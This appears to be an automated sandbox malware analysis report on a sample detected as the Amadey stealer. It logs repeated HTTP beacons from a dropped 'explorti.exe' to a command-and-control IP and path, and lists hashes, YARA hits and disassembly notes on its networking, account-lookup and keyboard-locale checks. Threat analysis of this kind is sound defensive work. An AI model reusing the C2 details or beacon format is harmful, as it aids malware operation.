Jul 27, 2024 06:34:53.763067961 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:54.010139942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	62274	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:54.126255035 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:54.903508902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:54.904967070 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:55.157058954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	62275	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:55.274720907 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:56.040918112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:56.042365074 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:56.371234894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	62276	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:56.699549913 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:57.468698025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:57.472348928 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:57.722233057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	62277	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:57.852322102 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:58.615835905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:58.617325068 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:58.863245964 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	00:32:52
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\f3wrBtIYXx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\f3wrBtIYXx.exe"
Imagebase:	0x6d0000
File size:	1'892'864 bytes
MD5 hash:	F06DC6079B508F90F845063C8FD658A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1697881645.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1657646956.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:32:55
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Imagebase:	0x710000
File size:	1'892'864 bytes
MD5 hash:	F06DC6079B508F90F845063C8FD658A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1683597722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1723999610.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:32:55
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x710000
File size:	1'892'864 bytes
MD5 hash:	F06DC6079B508F90F845063C8FD658A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1730102498.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1689899976.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:34:00
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Imagebase:	0x710000
File size:	1'892'864 bytes
MD5 hash:	F06DC6079B508F90F845063C8FD658A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2332657432.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 05070C71 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

'PR, xrefs: 05070C92

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID: 'PR
API String ID: 0-2253354516
Opcode ID: d550c54ffd097c2689fead354065e00789e7bd8f76a73272905afcc90136d1e9
Instruction ID: 32c65905d9857392f6b5bbc252bf253c1a78f0fd23f471f88052c7131d405387
Opcode Fuzzy Hash: d550c54ffd097c2689fead354065e00789e7bd8f76a73272905afcc90136d1e9
Instruction Fuzzy Hash: 8F017BAB50C0086EA242C2513B6C1FD3BAFD1E21303309623F043C9501D5960F8F0D39

Function 05070CD8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f1992a645467644c4af925fa62a0534222659c55bf4607327dded998b9f4bf
Instruction ID: e1b0c3238305f4dca6520bd2b2c4d3cda7cd555fdfa5d53a4c1a92a8bba4dbd9
Opcode Fuzzy Hash: b6f1992a645467644c4af925fa62a0534222659c55bf4607327dded998b9f4bf
Instruction Fuzzy Hash: B2F02BAB44D158AE515695513A6D0BE3EBBE0831303304A27F047C5542D5C51F4D2939

Function 05070CAC Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 979cdbe1e8498571c730f5de8fa5610882e79d90d03a96ace9ec7e3b9c8f3ffd
Instruction ID: 69783cf3ee75e750c89e1ae409145b39c509e78db727dbc43cc788d2adbf2001
Opcode Fuzzy Hash: 979cdbe1e8498571c730f5de8fa5610882e79d90d03a96ace9ec7e3b9c8f3ffd
Instruction Fuzzy Hash: 35E092EF44D118AD6086D2A2376D1BE7AAFE4C32303308A23B443D1A01D6D50F8E5839

Function 05070CC3 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c0d575f2f15486deff13a99d3e4dcb88282f3bd98e5fb63a729671f20ae8eb
Instruction ID: b35e1474165dd82197d8ea400237232ac7913e508a8ce2c91ca03b1a9a632037
Opcode Fuzzy Hash: 54c0d575f2f15486deff13a99d3e4dcb88282f3bd98e5fb63a729671f20ae8eb
Instruction Fuzzy Hash: 7DE086EF54C11CAD6041A192376C6FE6ABFE1D32303709632B003D5941DAD51F8E5539

Non-executed Functions

Function 05070621 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad88dd1ba9c0f82620a3b14c7889b5f5ea4014802aa762c84ac40c4dbfbe6d4c
Instruction ID: ec075f2358bbc2e5b06473ce06ad46126ddfdae98492adcbea7694f17be9b032
Opcode Fuzzy Hash: ad88dd1ba9c0f82620a3b14c7889b5f5ea4014802aa762c84ac40c4dbfbe6d4c
Instruction Fuzzy Hash: 26F0D1A754D1286EB105845B3F789FF7B6FE5C3230332832AF046D6543E285094949BC

Function 05070205 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1700055328.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5070000_f3wrBtIYXx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fd0254b32831c872feebb65f0ff41ff4d6de58c1e18ca10635ab685f0a38cd
Instruction ID: b69d39728f3b7867c9f7e45c1ed8d9788a7f8e54226e3b47c2c0b655389e79ad
Opcode Fuzzy Hash: 97fd0254b32831c872feebb65f0ff41ff4d6de58c1e18ca10635ab685f0a38cd
Instruction Fuzzy Hash: CDF04CA3E4D16C9D5183C265797C4BE2F5BE98B2703310391E446CF113C141654B4DAC

Analysis Process: explorti.exePID: 7956, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.8%
Total number of Nodes:	541
Total number of Limit Nodes:	33

Executed Functions

Function 0071BD60 Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00768D68,00000000,00000000,00000000,00000000), ref: 0071BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0071BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0071BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0071BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0071BFCD
InternetCloseHandle.WININET(?), ref: 0071C0A7
InternetCloseHandle.WININET(?), ref: 0071C0AF
InternetCloseHandle.WININET(?), ref: 0071C0B7

Strings

stoi argument out of range, xrefs: 0071E3FA
\s**, xrefs: 0071C871
\s**, xrefs: 0071B934, 0071BD77, 0071C297, 0071CD7B, 0071D4B5, 0071D60B, 0071DC3F
invalid stoi argument, xrefs: 0071E404
6JLUcxtnEx==, xrefs: 0071C2EB, 0071C543
\s**, xrefs: 0071C8D7, 0071C8DA
PG3NVu==, xrefs: 0071BE33
d4w, xrefs: 0071E2FF
PoPn, xrefs: 0071D516
6JLUcBRYEz9=, xrefs: 0071C385

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$\s**$\s**$\s**$d4w$invalid stoi argument$stoi argument out of range
API String ID: 688256393-381641060
Opcode ID: 44ec602fec008d3dcab9df29d4a928fa088b54d9cd8797ec37e4755b13a11af7
Instruction ID: 256cf91afd481d44239989a658d76a0479c7328a47d01f13987e29dc5d4e5790
Opcode Fuzzy Hash: 44ec602fec008d3dcab9df29d4a928fa088b54d9cd8797ec37e4755b13a11af7
Instruction Fuzzy Hash: 6CB1D4B1600118DBEB29CF68CC89BEDBB79EF45304F5041A9F509972C2E7789AC4CB95

Function 007165B0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00716650

Strings

\s**, xrefs: 00715904, 00715B34, 00715DF6, 00715F4B, 007165C7, 0071707C
EUVmdK==, xrefs: 007166F8
PAUfbBZl, xrefs: 0071666C
GUPmdK==, xrefs: 007167A1

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: EUVmdK==$GUPmdK==$PAUfbBZl$\s**
API String ID: 1484870144-882399526
Opcode ID: 736173963ed7d138dd64530c158897a09a1d3851d99894233c352fd294183ae3
Instruction ID: 1de50a7f49144be4889fca38142e1e3d0388b7c949d9ff49642efd0c76db5ce3
Opcode Fuzzy Hash: 736173963ed7d138dd64530c158897a09a1d3851d99894233c352fd294183ae3
Instruction Fuzzy Hash: AF91B6B19001189BDB28DB28CC89BDDB779EB45304F5045E9E50997282EB789FC4CFA4

Function 007246C0 Relevance: 38.5, APIs: 1, Strings: 23, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00727870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0072795C
Part of subcall function 00727870: __Cnd_destroy_in_situ.LIBCPMT ref: 00727968
Part of subcall function 00727870: __Mtx_destroy_in_situ.LIBCPMT ref: 00727971

Part of subcall function 0071BD60: InternetOpenW.WININET(00768D68,00000000,00000000,00000000,00000000), ref: 0071BDED
Part of subcall function 0071BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0071BE11
Part of subcall function 0071BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0071BE5B

std::_Xinvalid_argument.LIBCPMT ref: 00724EA2

Strings

stoi argument out of range, xrefs: 00724269, 00724EAC
9pG0, xrefs: 007254DB
8lU=, xrefs: 00726383, 00726652
Dy==, xrefs: 0072369E, 00724D2D
7470, xrefs: 0072531D
KIK+, xrefs: 007247BD, 007248EC, 00724ADC, 00724C0B
TZC0, xrefs: 0072541E
85K3cq==, xrefs: 00724712
TZS0, xrefs: 0072537A
Toe0, xrefs: 00725447
IEYUMK==, xrefs: 007254B9
7JS0, xrefs: 00725351
8IG0, xrefs: 007253F5
6YK0, xrefs: 00725502
9YY0, xrefs: 007253CC
\s**, xrefs: 00723567, 007242B4, 007246D4, 00724EFB, 00726AF6
0657d1, xrefs: 00725489
246122658369, xrefs: 00724F4D, 00724F8F, 00724F99, 007254F4
KIG+, xrefs: 00724776, 007247ED, 00724A95, 00724B0C
UIU0, xrefs: 007253A3
-w, xrefs: 00724F3A
84K0, xrefs: 00725497
75G0, xrefs: 00725470

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$\s**$stoi argument out of range$-w
API String ID: 2414744145-779239699
Opcode ID: ae765b3af99c462c49d2c4904a9dc1f5e525946c5dca1d331977e04a166e15c9
Instruction ID: 5bc72b438e78adc44330a12372315bd8d5a5f66c4df234899609b0c1aae5e9e7
Opcode Fuzzy Hash: ae765b3af99c462c49d2c4904a9dc1f5e525946c5dca1d331977e04a166e15c9
Instruction Fuzzy Hash: E5231671A00168DBEB29DB28DD8979DBB769B81304F5481D8E0486B2C2EB7D5FC4CF91

Function 00715DF0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 0071603B
Keyboard Layout\Preload, xrefs: 00715F64
\s**, xrefs: 00715904, 00715B34, 00715C77, 00715DF6, 00715F4B, 007165C7, 0071707C
00000423, xrefs: 0071600A
00000419, xrefs: 00715FA8
00000422, xrefs: 00715FD9

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
